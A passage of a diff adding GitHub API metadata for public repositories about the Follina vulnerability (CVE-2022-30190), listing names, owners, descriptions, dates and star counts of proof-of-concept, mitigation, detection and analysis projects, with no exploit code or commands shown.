"has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499194094, + "name": "CVE-2022-30190---Follina---Poc-Exploit", + "full_name": "WesyHub\/CVE-2022-30190---Follina---Poc-Exploit", + "owner": { + "login": "WesyHub", + "id": 35263085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35263085?v=4", + "html_url": "https:\/\/github.com\/WesyHub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WesyHub\/CVE-2022-30190---Follina---Poc-Exploit", + "description": "Simple Follina poc exploit", + "fork": false, + "created_at": "2022-06-02T15:39:20Z", + "updated_at": "2022-10-02T00:23:18Z", + "pushed_at": "2022-06-03T06:49:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499203683, + "name": "MS-MSDT-Office-RCE-Follina", + "full_name": "0xflagplz\/MS-MSDT-Office-RCE-Follina", + "owner": { + "login": "0xflagplz", + "id": 59506742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59506742?v=4", + "html_url": "https:\/\/github.com\/0xflagplz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xflagplz\/MS-MSDT-Office-RCE-Follina", + "description": "CVE-2022-30190 | MS-MSDT Follina One Click", + "fork": false, + "created_at": "2022-06-02T16:09:02Z", + "updated_at": "2024-08-12T20:23:47Z", + "pushed_at": "2022-06-03T08:14:10Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499205371, + "name": "CVE-2022-30190", + "full_name": "arozx\/CVE-2022-30190", + "owner": { + "login": "arozx", + "id": 87201477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87201477?v=4", + "html_url": "https:\/\/github.com\/arozx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arozx\/CVE-2022-30190", + "description": "A very simple MSDT \"Follina\" exploit **patched**", + "fork": false, + "created_at": "2022-06-02T16:14:13Z", + "updated_at": "2023-02-14T18:19:06Z", + "pushed_at": "2022-11-01T16:53:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "exploit", + "follina", + "patched", + "poc", + "security", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499331391, + "name": "follina", + "full_name": "Noxtal\/follina", + "owner": { + "login": "Noxtal", + "id": 44851191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44851191?v=4", + "html_url": "https:\/\/github.com\/Noxtal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Noxtal\/follina", + "description": "All about CVE-2022-30190, aka follina, that is a RCE vulnerability that affects Microsoft Support Diagnostic Tools (MSDT) on Office apps such as Word. This is a very simple POC, feel free to check the sources below for more threat intelligence.", + "fork": false, + "created_at": "2022-06-03T00:25:37Z", + "updated_at": "2024-07-17T14:32:06Z", + "pushed_at": "2022-08-06T01:04:51Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499395518, + "name": "CVE-2022-30190", + "full_name": "droidrzrlover\/CVE-2022-30190", + "owner": { + "login": "droidrzrlover", + "id": 19541946, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19541946?v=4", + "html_url": "https:\/\/github.com\/droidrzrlover", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/droidrzrlover\/CVE-2022-30190", + "description": "This is to patch CVE-2022-30190. Use at your own risk. ", + "fork": false, + "created_at": "2022-06-03T05:52:36Z", + "updated_at": "2022-06-03T05:53:04Z", + "pushed_at": "2022-06-03T05:53:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499410553, + "name": "cve-2022-30190-mitigate", + "full_name": "hilt86\/cve-2022-30190-mitigate", + "owner": { + "login": "hilt86", + "id": 441824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/441824?v=4", + "html_url": "https:\/\/github.com\/hilt86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hilt86\/cve-2022-30190-mitigate", + "description": "Powershell script to mitigate cve-2022-30190", + "fork": false, + "created_at": "2022-06-03T06:54:35Z", + "updated_at": "2022-06-03T06:55:13Z", + "pushed_at": "2022-06-03T06:55:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499428287, + "name": "CVE-2022-30190", + "full_name": "SrikeshMaharaj\/CVE-2022-30190", + "owner": { + "login": "SrikeshMaharaj", + "id": 24547010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24547010?v=4", + "html_url": "https:\/\/github.com\/SrikeshMaharaj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SrikeshMaharaj\/CVE-2022-30190", + "description": "Follina POC by John Hammond", + "fork": false, + "created_at": "2022-06-03T08:00:01Z", + "updated_at": "2023-10-27T01:25:17Z", + "pushed_at": "2022-06-03T08:04:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499846982, + "name": "Follina", + "full_name": "AbdulRKB\/Follina", + "owner": { + "login": "AbdulRKB", + "id": 82715493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82715493?v=4", + "html_url": "https:\/\/github.com\/AbdulRKB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdulRKB\/Follina", + "description": "Remote Access Shell for Windows (based on cve-2022-30190)", + "fork": false, + "created_at": "2022-06-04T14:18:38Z", + "updated_at": "2024-08-12T20:23:50Z", + "pushed_at": "2024-02-09T17:18:42Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "follina", + "mstd", + "reverse-shell", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499922590, + "name": "CVE-2022-30190", + "full_name": "DerZiad\/CVE-2022-30190", + "owner": { + "login": "DerZiad", + "id": 40337316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40337316?v=4", + "html_url": "https:\/\/github.com\/DerZiad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DerZiad\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-04T19:48:37Z", + "updated_at": "2024-08-12T20:23:51Z", + "pushed_at": "2023-07-25T07:47:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": true, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500045782, + "name": "CVE-2022-30190-Zero-Click-Zero-Day-in-msdt", + "full_name": "tej7gandhi\/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt", + "owner": { + "login": "tej7gandhi", + "id": 13482291, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13482291?v=4", + "html_url": "https:\/\/github.com\/tej7gandhi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tej7gandhi\/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt", + "description": null, + "fork": false, + "created_at": "2022-06-05T08:52:11Z", + "updated_at": "2022-06-05T08:54:30Z", + "pushed_at": "2022-06-05T08:54:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500111558, + "name": "Follina-CVE-2022-30190-POC", + "full_name": "ItsNee\/Follina-CVE-2022-30190-POC", + "owner": { + "login": "ItsNee", + "id": 28183719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28183719?v=4", + "html_url": "https:\/\/github.com\/ItsNee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ItsNee\/Follina-CVE-2022-30190-POC", + "description": null, + "fork": false, + "created_at": "2022-06-05T13:54:04Z", + "updated_at": "2023-02-09T18:20:51Z", + "pushed_at": "2022-07-04T13:27:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500366448, + "name": "msdt-follina", + "full_name": "IamVSM\/msdt-follina", + "owner": { + "login": "IamVSM", + "id": 5747913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5747913?v=4", + "html_url": "https:\/\/github.com\/IamVSM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IamVSM\/msdt-follina", + "description": "Microsoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 Attack Vector", + "fork": false, + "created_at": "2022-06-06T09:17:25Z", + "updated_at": "2022-06-08T05:08:19Z", + "pushed_at": "2022-06-06T09:17:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500508968, + "name": "FollinaPatcherCLI", + "full_name": "Rojacur\/FollinaPatcherCLI", + "owner": { + "login": "Rojacur", + "id": 106988270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106988270?v=4", + "html_url": "https:\/\/github.com\/Rojacur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rojacur\/FollinaPatcherCLI", + "description": "Désactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un déploiement en masse", + "fork": false, + "created_at": "2022-06-06T16:25:41Z", + "updated_at": "2022-06-06T16:52:06Z", + "pushed_at": "2022-06-07T11:09:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500786615, + "name": "CVE-2022-30190", + "full_name": "joshuavanderpoll\/CVE-2022-30190", + "owner": { + "login": "joshuavanderpoll", + "id": 16516497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16516497?v=4", + "html_url": "https:\/\/github.com\/joshuavanderpoll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joshuavanderpoll\/CVE-2022-30190", + "description": "Microsoft Support Diagnostic Tool (CVE-2022-30190)", + "fork": false, + "created_at": "2022-06-07T10:07:52Z", + "updated_at": "2024-08-12T20:23:55Z", + "pushed_at": "2022-06-07T10:10:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500934660, + "name": "Follina", + "full_name": "abhirules27\/Follina", + "owner": { + "login": "abhirules27", + "id": 23321239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23321239?v=4", + "html_url": "https:\/\/github.com\/abhirules27", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abhirules27\/Follina", + "description": "Notes related to CVE-2022-30190", + "fork": false, + "created_at": "2022-06-07T17:11:57Z", + "updated_at": "2022-06-07T17:11:57Z", + "pushed_at": "2022-06-07T17:14:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 501026730, + "name": "follina-spring", + "full_name": "dsibilio\/follina-spring", + "owner": { + "login": "dsibilio", + "id": 24280982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24280982?v=4", + "html_url": "https:\/\/github.com\/dsibilio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dsibilio\/follina-spring", + "description": "Server to host\/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)", + "fork": false, + "created_at": "2022-06-07T22:46:23Z", + "updated_at": "2024-04-28T12:49:57Z", + "pushed_at": "2022-06-14T20:30:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "cybersecurity", + "follina", + "infosec", + "java", + "mesdetty", + "ms-msdt", + "msdt", + "spring", + "spring-boot" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501212142, + "name": "Deathnote", + "full_name": "Malwareman007\/Deathnote", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/Deathnote", + "description": "Proof of Concept of CVE-2022-30190", + "fork": false, + "created_at": "2022-06-08T10:58:23Z", + "updated_at": "2024-09-08T14:28:01Z", + "pushed_at": "2022-10-06T14:49:56Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "follina", + "microsoft", + "msdt", + "msword", + "vulnerability", + "zeroday" + ], + "visibility": "public", + "forks": 7, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501283166, + "name": "Follina-Workaround-CVE-2022-30190", + "full_name": "sentrium-security\/Follina-Workaround-CVE-2022-30190", + "owner": { + "login": "sentrium-security", + "id": 53477514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53477514?v=4", + "html_url": "https:\/\/github.com\/sentrium-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sentrium-security\/Follina-Workaround-CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-08T14:20:50Z", + "updated_at": "2022-06-08T14:29:37Z", + "pushed_at": "2022-07-14T16:18:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 501589039, + "name": "Follina_Exploiter_CLI", + "full_name": "Hrishikesh7665\/Follina_Exploiter_CLI", + "owner": { + "login": "Hrishikesh7665", + "id": 57979686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57979686?v=4", + "html_url": "https:\/\/github.com\/Hrishikesh7665", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hrishikesh7665\/Follina_Exploiter_CLI", + "description": "Exploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)", + "fork": false, + "created_at": "2022-06-09T09:32:10Z", + "updated_at": "2024-08-27T09:07:07Z", + "pushed_at": "2022-06-16T07:28:13Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "exploit", + "follina", + "micorsoft-office", + "microsoft", + "msdt", + "rce", + "remote-code-execution", + "word" + ], + "visibility": "public", + "forks": 14, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 501598812, + "name": "Clickstudio-compromised-certificate", + "full_name": "b401\/Clickstudio-compromised-certificate", + "owner": { + "login": "b401", + "id": 41926529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41926529?v=4", + "html_url": "https:\/\/github.com\/b401", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b401\/Clickstudio-compromised-certificate", + "description": "Repository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks.", + "fork": false, + "created_at": "2022-06-09T10:03:06Z", + "updated_at": "2024-02-03T15:41:02Z", + "pushed_at": "2022-06-09T10:06:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501848298, + "name": "CVE-2022-30190", + "full_name": "k508\/CVE-2022-30190", + "owner": { + "login": "k508", + "id": 44594320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44594320?v=4", + "html_url": "https:\/\/github.com\/k508", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k508\/CVE-2022-30190", + "description": "Mitigation for CVE-2022-30190", + "fork": false, + "created_at": "2022-06-10T00:23:11Z", + "updated_at": "2022-06-10T00:25:47Z", + "pushed_at": "2022-06-10T00:33:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502082566, + "name": "follina_cve_2022-30190", + "full_name": "amitniz\/follina_cve_2022-30190", + "owner": { + "login": "amitniz", + "id": 25344020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25344020?v=4", + "html_url": "https:\/\/github.com\/amitniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitniz\/follina_cve_2022-30190", + "description": "proof of concept to CVE-2022-30190 (follina)", + "fork": false, + "created_at": "2022-06-10T14:57:17Z", + "updated_at": "2024-01-13T07:28:10Z", + "pushed_at": "2022-06-11T19:12:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30190", + "exploit", + "follina", + "poc", + "remote-shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502110629, + "name": "CVE-2022-30190-Analysis-With-LetsDefends-Lab", + "full_name": "Abdibimantara\/CVE-2022-30190-Analysis-With-LetsDefends-Lab", + "owner": { + "login": "Abdibimantara", + "id": 43168046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43168046?v=4", + "html_url": "https:\/\/github.com\/Abdibimantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdibimantara\/CVE-2022-30190-Analysis-With-LetsDefends-Lab", + "description": "this is my simple article about CVE 2022-30190 (Follina) analysis. I use the lab from Letsdefend.", + "fork": false, + "created_at": "2022-06-10T16:29:07Z", + "updated_at": "2022-06-10T16:29:07Z", + "pushed_at": "2022-06-10T16:37:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502326888, + "name": "CVE-2022-30190_Temporary_Fix", + "full_name": "SrCroqueta\/CVE-2022-30190_Temporary_Fix", + "owner": { + "login": "SrCroqueta", + "id": 32432079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32432079?v=4", + "html_url": "https:\/\/github.com\/SrCroqueta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SrCroqueta\/CVE-2022-30190_Temporary_Fix", + "description": "These are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)", + "fork": false, + "created_at": "2022-06-11T11:16:56Z", + "updated_at": "2022-06-15T10:21:00Z", + "pushed_at": "2022-06-26T17:27:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 502600692, + "name": "CVE-2022-30190_Temporary_Fix_Source_Code", + "full_name": "SrCroqueta\/CVE-2022-30190_Temporary_Fix_Source_Code", + "owner": { + "login": "SrCroqueta", + "id": 32432079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32432079?v=4", + "html_url": "https:\/\/github.com\/SrCroqueta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SrCroqueta\/CVE-2022-30190_Temporary_Fix_Source_Code", + "description": "These are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)", + "fork": false, + "created_at": "2022-06-12T11:48:22Z", + "updated_at": "2022-06-15T10:20:20Z", + "pushed_at": "2022-06-21T17:29:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 502803172, + "name": "Follina-CVE-2022-30190-Unofficial-patch", + "full_name": "SonicWave21\/Follina-CVE-2022-30190-Unofficial-patch", + "owner": { + "login": "SonicWave21", + "id": 107382379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107382379?v=4", + "html_url": "https:\/\/github.com\/SonicWave21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SonicWave21\/Follina-CVE-2022-30190-Unofficial-patch", + "description": "An Unofficial Patch Follina CVE-2022-30190 (patch) by micrisoft Guidelines.", + "fork": false, + "created_at": "2022-06-13T04:20:02Z", + "updated_at": "2024-08-12T20:24:05Z", + "pushed_at": "2022-06-14T13:32:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "batch", + "cve-2022-30190", + "follina", + "microsoft", + "ms-msdt", + "patch", + "windows-10", + "windows-11", + "zero-day" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502856771, + "name": "PicusSecurity4.Week.Repo", + "full_name": "nanaao\/PicusSecurity4.Week.Repo", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/PicusSecurity4.Week.Repo", + "description": "CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina ", + "fork": false, + "created_at": "2022-06-13T07:46:29Z", + "updated_at": "2024-08-12T20:24:06Z", + "pushed_at": "2022-06-12T20:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 503121339, + "name": "CVE-2022-30190", + "full_name": "XxToxicScriptxX\/CVE-2022-30190", + "owner": { + "login": "XxToxicScriptxX", + "id": 72946006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72946006?v=4", + "html_url": "https:\/\/github.com\/XxToxicScriptxX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XxToxicScriptxX\/CVE-2022-30190", + "description": "Python file scanner created in 2021 scanning for known and potential vulns", + "fork": false, + "created_at": "2022-06-13T21:32:45Z", + "updated_at": "2022-06-13T21:36:40Z", + "pushed_at": "2022-06-13T21:36:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503273195, + "name": "CVE-2022-30190", + "full_name": "ernestak\/CVE-2022-30190", + "owner": { + "login": "ernestak", + "id": 97414565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97414565?v=4", + "html_url": "https:\/\/github.com\/ernestak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ernestak\/CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-14T08:29:40Z", + "updated_at": "2024-08-12T20:24:08Z", + "pushed_at": "2022-06-14T08:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503292025, + "name": "Sigma-Rule-for-CVE-2022-30190", + "full_name": "ernestak\/Sigma-Rule-for-CVE-2022-30190", + "owner": { + "login": "ernestak", + "id": 97414565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97414565?v=4", + "html_url": "https:\/\/github.com\/ernestak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ernestak\/Sigma-Rule-for-CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-14T09:27:37Z", + "updated_at": "2022-06-14T09:27:37Z", + "pushed_at": "2022-06-14T09:27:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503586593, + "name": "FollinaExtractor", + "full_name": "MalwareTech\/FollinaExtractor", + "owner": { + "login": "MalwareTech", + "id": 7256561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4", + "html_url": "https:\/\/github.com\/MalwareTech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalwareTech\/FollinaExtractor", + "description": "Extract payload URLs from Follina (CVE-2022-30190) docx and rtf files", + "fork": false, + "created_at": "2022-06-15T02:22:53Z", + "updated_at": "2024-10-28T18:14:27Z", + "pushed_at": "2022-06-15T02:24:00Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 503694177, + "name": "follina-CVE-2022-30190", + "full_name": "notherealhazard\/follina-CVE-2022-30190", + "owner": { + "login": "notherealhazard", + "id": 106530435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106530435?v=4", + "html_url": "https:\/\/github.com\/notherealhazard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notherealhazard\/follina-CVE-2022-30190", + "description": null, + "fork": false, + "created_at": "2022-06-15T09:13:05Z", + "updated_at": "2022-06-15T09:15:12Z", + "pushed_at": "2022-06-15T11:01:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 503944049, + "name": "follina-CVE-2022-30190", + "full_name": "Cerebrovinny\/follina-CVE-2022-30190", + "owner": { + "login": "Cerebrovinny", + "id": 52631834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52631834?v=4", + "html_url": "https:\/\/github.com\/Cerebrovinny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cerebrovinny\/follina-CVE-2022-30190", + "description": "follina zero day vulnerability to help Microsoft to mitigate the attack", + "fork": false, + "created_at": "2022-06-15T22:49:21Z", + "updated_at": "2022-06-16T00:04:19Z", + "pushed_at": "2022-06-16T00:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + 